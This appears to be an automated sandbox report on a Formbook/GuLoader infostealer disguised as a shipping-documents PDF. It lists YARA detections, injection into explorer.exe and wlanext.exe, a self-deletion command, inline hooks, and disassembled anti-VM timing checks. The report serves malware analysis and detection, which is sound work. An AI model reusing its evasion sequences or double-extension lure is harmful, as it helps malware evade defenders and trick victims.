      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46DBD21_2_1E46DBD2
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E471FF11_2_1E471FF1
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B841F1_2_1E3B841F
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4610021_2_1E461002
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D20A01_2_1E3D20A0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BB0901_2_1E3BB090
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4720A81_2_1E4720A8
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E471D551_2_1E471D55
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A0D201_2_1E3A0D20
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C41201_2_1E3C4120
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AF9001_2_1E3AF900
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E472D071_2_1E472D07
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4725DD1_2_1E4725DD
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D25811_2_1E3D2581
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BD5E01_2_1E3BD5E0
      Source: C:\Windows\explorer.exeCode function: 3_2_061F4A323_2_061F4A32
      Source: C:\Windows\explorer.exeCode function: 3_2_061EB0723_2_061EB072
      Source: C:\Windows\explorer.exeCode function: 3_2_061F7A6F3_2_061F7A6F
      Source: C:\Windows\explorer.exeCode function: 3_2_061EB0693_2_061EB069
      Source: C:\Windows\explorer.exeCode function: 3_2_061F38623_2_061F3862
      Source: C:\Windows\explorer.exeCode function: 3_2_061ECCF23_2_061ECCF2
      Source: C:\Windows\explorer.exeCode function: 3_2_061ECCEC3_2_061ECCEC
      Source: C:\Windows\explorer.exeCode function: 3_2_061EFB1F3_2_061EFB1F
      Source: C:\Windows\explorer.exeCode function: 3_2_061F7B0E3_2_061F7B0E
      Source: C:\Windows\explorer.exeCode function: 3_2_061F21323_2_061F2132
      Source: C:\Windows\explorer.exeCode function: 3_2_061EFB223_2_061EFB22
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352AB4011_2_0352AB40
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D2B2811_2_035D2B28
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C03DA11_2_035C03DA
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CDBD211_2_035CDBD2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353EBB011_2_0353EBB0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035BFA2B11_2_035BFA2B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D22AE11_2_035D22AE
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350F90011_2_0350F900
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352412011_2_03524120
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C100211_2_035C1002
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035DE82411_2_035DE824
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D28EC11_2_035D28EC
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351B09011_2_0351B090
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A011_2_035320A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D20A811_2_035D20A8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035DDFCE11_2_035DDFCE
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D1FF111_2_035D1FF1
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CD61611_2_035CD616
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03526E3011_2_03526E30
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D2EF711_2_035D2EF7
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D1D5511_2_035D1D55
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D2D0711_2_035D2D07
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03500D2011_2_03500D20
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D25DD11_2_035D25DD
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351D5E011_2_0351D5E0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353258111_2_03532581
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CD46611_2_035CD466
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351841F11_2_0351841F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6DB7D11_2_00C6DB7D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C52D8911_2_00C52D89
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C52D9011_2_00C52D90
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C59E4011_2_00C59E40
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C59E3B11_2_00C59E3B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6DFC911_2_00C6DFC9
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C52FB011_2_00C52FB0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0350B150 appears 48 times
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: String function: 1E3AB150 appears 35 times
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000000.00000002.241735598.0000000002090000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.318768141.000000001E62F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312668816.0000000002590000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000000.240728958.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamefdselskontrol.exe vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000003.311332726.00000000009C3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312648510.0000000002540000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exeBinary or memory string: OriginalFilenamefdselskontrol.exe vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: 0000000B.00000002.485764868.00000000031ED000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.487639953.0000000003A0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@4/3
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5980:120:WilError_01
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\~DFCBA05B85C1CFCA00.TMPJump to behavior
      Source: Shipping Documents (INV,PL,BL)_pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Shipping Documents (INV,PL,BL)_pdf.exeVirustotal: Detection: 21%
      Source: unknownProcess created: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess created: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'Jump to behavior
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.296872528.000000000E1C0000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp, wlanext.exe, 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: Shipping Documents (INV,PL,BL)_pdf.exe, wlanext.exe
      Source: Binary string: wlanext.pdb source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000003.311332726.00000000009C3000.00000004.00000001.sdmp
      Source: Binary string: wlanext.pdbGCTL source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000003.311332726.00000000009C3000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.296872528.000000000E1C0000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: Shipping Documents (INV,PL,BL)_pdf.exe PID: 5268, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: Shipping Documents (INV,PL,BL)_pdf.exe PID: 5268, type: MEMORY
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F8356 push ds; iretd 0_2_020F8363
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F8365 push ds; iretd 0_2_020F8380
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F07CD pushad ; retf 0_2_020F07CF
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F07EE pushad ; retf 0_2_020F07F0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3FD0D1 push ecx; ret 1_2_1E3FD0E4
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00568355 push ds; iretd 1_2_00568363
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00568365 push ds; iretd 1_2_00568380
      Source: C:\Windows\explorer.exeCode function: 3_2_061F83E6 pushad ; ret 3_2_061F83E7
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0355D0D1 push ecx; ret 11_2_0355D0E4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6705B push esi; ret 11_2_00C6705C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C66989 push edi; retf 11_2_00C6698F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C67C5E push esi; iretd 11_2_00C67C5F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C67D40 push eax; ret 11_2_00C67D41
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6CEE2 push eax; ret 11_2_00C6CEE8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6CEEB push eax; ret 11_2_00C6CF52
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6CE95 push eax; ret 11_2_00C6CEE8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C69666 push ss; iretd 11_2_00C6966B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C66679 push ebp; retf 11_2_00C6667A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6AE79 push ebx; ret 11_2_00C6AE7D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6BE12 push ebp; ret 11_2_00C6BE15
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6CF4C push eax; ret 11_2_00C6CF52

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xED
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0D0F NtWriteVirtualMemory,TerminateProcess,0_2_020F0D0F
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0E46 TerminateProcess,0_2_020F0E46
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0E55 TerminateProcess,0_2_020F0E55
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0EB1 TerminateProcess,0_2_020F0EB1
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0EF6 TerminateProcess,0_2_020F0EF6
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0F55 TerminateProcess,0_2_020F0F55
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0FA7 TerminateProcess,0_2_020F0FA7
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0FEC TerminateProcess,0_2_020F0FEC
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F1039 TerminateProcess,0_2_020F1039
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F1083 TerminateProcess,0_2_020F1083
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F10D7 TerminateProcess,0_2_020F10D7
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F117A TerminateProcess,0_2_020F117A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0D81 TerminateProcess,0_2_020F0D81
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0DE0 TerminateProcess,0_2_020F0DE0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F11F6 TerminateProcess,0_2_020F11F6
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeRDTSC instruction interceptor: First address: 00000000020F8088 second address: 00000000020F8088 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F0E14EF96D8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f jmp 00007F0E14EF96F6h 0x00000021 test cx, cx 0x00000024 test eax, ecx 0x00000026 add edi, edx 0x00000028 pushad 0x00000029 mov ah, 87h 0x0000002b cmp ah, FFFFFF87h 0x0000002e jne 00007F0E14EF4D8Ch 0x00000034 popad 0x00000035 dec dword ptr [ebp+000000F8h] 0x0000003b cmp dword ptr [ebp+000000F8h], 00000000h 0x00000042 jne 00007F0E14EF967Fh 0x00000044 cmp ax, cx 0x00000047 cmp dh, dh 0x00000049 call 00007F0E14EF975Bh 0x0000004e call 00007F0E14EF96EAh 0x00000053 lfence 0x00000056 mov edx, dword ptr [7FFE0014h] 0x0000005c lfence 0x0000005f ret 0x00000060 mov esi, edx 0x00000062 pushad 0x00000063 rdtsc
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: Shipping Documents (INV,PL,BL)_pdf.exeBinary or memory string: ROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: Shipping Documents (INV,PL,BL)_pdf.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeRDTSC instruction interceptor: First address: 00000000020F8088 second address: 00000000020F8088 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F0E14EF96D8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f jmp 00007F0E14EF96F6h 0x00000021 test cx, cx 0x00000024 test eax, ecx 0x00000026 add edi, edx 0x00000028 pushad 0x00000029 mov ah, 87h 0x0000002b cmp ah, FFFFFF87h 0x0000002e jne 00007F0E14EF4D8Ch 0x00000034 popad 0x00000035 dec dword ptr [ebp+000000F8h] 0x0000003b cmp dword ptr [ebp+000000F8h], 00000000h 0x00000042 jne 00007F0E14EF967Fh 0x00000044 cmp ax, cx 0x00000047 cmp dh, dh 0x00000049 call 00007F0E14EF975Bh 0x0000004e call 00007F0E14EF96EAh 0x00000053 lfence 0x00000056 mov edx, dword ptr [7FFE0014h] 0x0000005c lfence 0x0000005f ret 0x00000060 mov esi, edx 0x00000062 pushad 0x00000063 rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeRDTSC instruction interceptor: First address: 00000000020F80AA second address: 00000000020F80AA instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F0E1437EC20h 0x0000001f popad 0x00000020 call 00007F0E1437E629h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeRDTSC instruction interceptor: First address: 00000000005680AA second address: 00000000005680AA instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F0E14EF9E30h 0x0000001f popad 0x00000020 call 00007F0E14EF9839h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000000C598E4 second address: 0000000000C598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000000C59B5E second address: 0000000000C59B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F086A rdtsc 0_2_020F086A
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe TID: 5736Thread sleep count: 190 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 1320Thread sleep time: -50000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exe TID: 5848Thread sleep time: -45000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 00000003.00000000.292008725.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000003.00000000.292008725.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
      Source: explorer.exe, 00000003.00000000.290769273.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000003.00000000.291283717.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: Shipping Documents (INV,PL,BL)_pdf.exeBinary or memory string: rogram Files\Qemu-ga\qemu-ga.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000003.00000002.497929772.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
